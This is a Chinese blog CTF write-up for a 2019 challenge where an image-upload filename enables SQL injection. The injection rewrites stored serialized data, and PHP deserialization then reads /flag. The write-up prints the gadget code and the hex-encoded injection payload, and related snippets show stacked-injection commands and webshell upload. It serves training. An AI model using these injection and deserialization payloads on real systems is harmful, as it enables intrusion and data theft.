BUUCTF:[安洵杯 2019]不是文件上传

最新推荐文章于 2024-03-27 09:07:59 发布
最新推荐文章于 2024-03-27 09:07:59 发布
阅读量1.9k 收藏
点赞数 3
分类专栏: CTF_WEB_Writeup
原文链接:https://xz.aliyun.com/t/6911
版权

这题和攻防世界XCTF:upload有点像,看似上传却都不是上传是上传图片的文件名注入
参考:安洵杯2019 官方Writeup

  1. 获取源码
    在网站首页存在一些信息
    在这里插入图片描述
    在gihtub找得到源码
    在这里插入图片描述
    BUU也给出了这题的源码
    在这里插入图片描述
  2. 漏洞分析
    在图片上传处,check函数并未对文件名(title)进行检测, 直接传递到最后的SQL语句当中。导致了SQL注入,并且属于Insert注入。

审计代码后可知,图片数据在保存的时候,会将图片的高度和宽度进行序列化然后保存。在查看图片信息的页面(show.php)会对其进行反序列化。

我们需要通过SQL注入修改保存的信息中的序列化的值来利用。

在helper.php中的helper类中有一个__destruct魔术方法可以利用,通过调用view_files中的file_get_contents来读取flag。

反序列化payload:

<?php
class helper {
    protected $ifview = True; 
    protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
?>

O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}

这里的属性值ifview和config都是protected类型的,所以需要将payload修改为:

O:6:"helper":2:{s:9:"\0\0\0ifview";b:1;s:9:"\0\0\0config";s:5:"/flag";}

(以至于为什么要将修改为\0\0\0,是因为源码中在存取过程中对protected类型的属性进行了处理。)

正常上传图片的sql语句为:

INSERT INTO images (`title`,`filename`,`ext`,`path`,`attr`) VALUES('TIM截图
20191102114857','f20c76cc4fb41838.jpg','jpg','pic/f20c76cc4fb41838.jpg','a:2:{s:5:"width";i:1264;s:6:"height";i:992;}')

由于title处是我们能够控制的,所以构造文件名如下:

1','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a225c305c305c30696676696577223b623a313b733a393a225c305c305c30636f6e666967223b733a353a222f666c6167223b7d),('1.jpg

因为上传的文件名中不能有双引号,所以将payload进行16进制编码。
在这里插入图片描述
使用 Brupsuite 将上传的 filename 修改为构造的文件名上传,再访问 show.php 即可得到flag。
上传一张图片,修改filename
在这里插入图片描述
访问show.php
在这里插入图片描述

末 初
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
BUUCTF】web之强网2019随便注
12-14
开始注入: 1’ : 报错 1’ #:回显正常 1’ order by 1 #: 正常(经测试列数为2–此处小白暗自窃喜) 1’ union select 1,2#: 回显 如图 看来此方法是行不通了,但经过苦苦寻求,了解到了堆叠注入: 库:1’;show databases;# 得到数据库 表:1’;show tables;# 得到俩个表 列:1’;show columns from ‘表名’;# 这里注意表名为数字的要加反引号 “ 注:在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
2020YCBCTF:2020羊城官方writeup及
03-24
2020年 2020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
BUUCTF/BUU UPLOAD COURSE 1
weixin_44041994的博客
03-21 229
我们直接上传webshell文件,发现自动将php后缀改为了jpg后缀。后续通过一系列burp suit更改发现无法绕过。随手上传一个echo 123的php发现直接访问修改文件名后的文件,可以执行代码。重新上传webshell并用中国蚁剑进行连接。连接成功,在根目录下找到flag文件。打开靶机,发现是一个文件上传页面。输入flag值,通关成功。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[代码审计]-安洵 2019 不是文件上传
Re_ly0n的博客
10-07 1620
说在前面 代码审计题目,buu平台给了源码链接,可自行下载 代码分析 代码下载完成后开始分析,看到了序列化和反序列化函数,尝试利用。 给三个php文件都看了一遍之后发现可以通过构造序列化去读取flag文件。 构造payload <?php class helper { protected $ifview = True; protected $config = "/flag"; } $a = new helper(); $b = serialize($a); echo
BUUCTF:[安洵 2019]不是文件上传 -- sql注入,PHP反序列化,sql16进制 单引号问题,
Zero_Adam的博客
04-04 364
目录:一、自己看着源码+WP复现 一、自己看着源码+WP复现 这周写了个上传下载文件的网站后,再做这种 文件上传相关的题目时就轻松多了,,至少代码是干什么的能看明白了, 其实数据库的键值是什么也看了有一会儿才看出来,然后才在本地复现的。 create database pic_base create table images( title varchar(100), filename varchar(100), ext varchar(100), path varchar(200), attr varch
[安洵 2019]不是文件上传1
m0_62129839的博客
02-22 136
又因为上传的文件名中不能有双引号,所以将payload进行16进制编码,别忘了前面加上0x。这道题首先给了源码,但是我没看到,进了页面,他储存的文件并不保存在他数据库,也不像是sql注入,所以扫描文件,拿到源码,审计。第一个可疑的地方是show.php里面的$attr变量,这里有一个反序列化。最后用#注释掉’value2’,‘value3’,…我审计的时候没看到,wp告诉我的,实际上这个位置很明显。三行字信息量巨大,全是我不会的小细节。php序列化代码,抄wp的。的图片,查看,得到flag。
buuCTF [安洵 2019]不是文件上传 1
weixin_45642610的博客
08-06 458
buuCTF [安洵 2019]不是文件上传 1 这题给了源码,buuctf上直接给了。GitHub上搜索wowouploadimage也搜得到 三个文件 upload.php <!DOCTYPE html> <html> <head> <title>Image Upload</title> <link rel="stylesheet" href="./style.css"> <meta http-equiv="cont
[安洵 2019]不是文件上传
feng的博客
04-13 300
知识点 SQL注入 WP 进入环境,有一个upload.php可以传文件,有一个show.php可以查看上传的列表,发现有点像是存入了数据库,再考虑到以前似乎听说过文件上传中文件名的SQL注入,就猜测这题应该其实是一个SQL注入。在filename那里尝试了一下,一开始是1.png可以,1.png'提示我必须上传图片,再考虑到show.php那里的回显,文件名是被加密的,因此猜测后端可能是把.png前面的东西单独的处理,存入了数据库,于是这样:1'.php,果然报wrong了,再试试1'or'1.php
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
变量覆盖漏洞 自定义的参数值替换原有变量值的情况称为变量覆盖漏洞 经常导致变量覆盖漏洞场景有:$使用不当,extract()函数使用不当,parse_str()函数使用不当,import_request_variables()使用不当,开启了全局...
BUUCTF刷题十一道(11)
最新发布
qq_45837896的博客
03-27 702
打开BUU排行榜仰望各位大佬,想来我所谓的努力还是微不足道。
[安洵 2019]不是文件上传 文件上传的注入
m0_67401270的博客
05-15 237
进入题目传了一个jpg图片上去 发现文件名被重命名了,但是给了我们一个path路径(难道就是一个绕过题?这么轻松就会告诉你路径,跟题目有点不符) 啪啪打脸,各个地方抓一下包show.php,upload.php以及show.phpdelete_all=true,按照经验我们应该在某个地方是可以获取到这些源码的,但是我这里找了很久根本找不到……,只能再一次求助别人的wp…… 没想到的是!!! 根据这条信息去github找这个出题人 获得源码,好好代码审计了(不愧是锻炼搜索能力,获得源码的方式长见识了)
[安洵 2019]不是文件上传 sql注入 发序列化 信息泄漏
a3320315的博客
01-30 2008
题目描述 找了半天也没找到题目的关键点·~~ 看了writeup才知道有个信息泄露 然后在github上下载源码就可以了~~ 解题过程 首先我们拿到一套源码,先找到哪段代码能够读取flag~~ 在helper.php中有一段代码,可以读取文件~~,很明显的反序列化~~ 然后我们在文中找一下序列化和反序列化的点~~ 大概说明一下代码的意思,我们上传图片时,会序列化图片的宽高,然后在show.php中...
[安洵 2019]不是文件上传(文件名不能用“,数据库可识别hex编码)
qq_62046696的博客
01-04 410
然后看到了file_get_contents可以读flag,所以$path=/flag,为什么是这个呢,是因为基本上的题目flag都在根目录如果不对可以再继续尝试,然后前提是ifview为true.数组变成了:O:6:"helper":2:{s:9:"\0\0\0ifview";打开题目尝试上传文件发现只能上传图片,然后看见了图片的路径,但是图片码连不上蚁键,结合题目,然后看到了题目给出的github源码。本来我是没相通为什么,后面序列化的需要hex编码,后来突然懂了,是因为双引号被禁用。
buuctf-强网2019随便注
09-03
buuctf-强网2019随便注是一场2019年强网举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值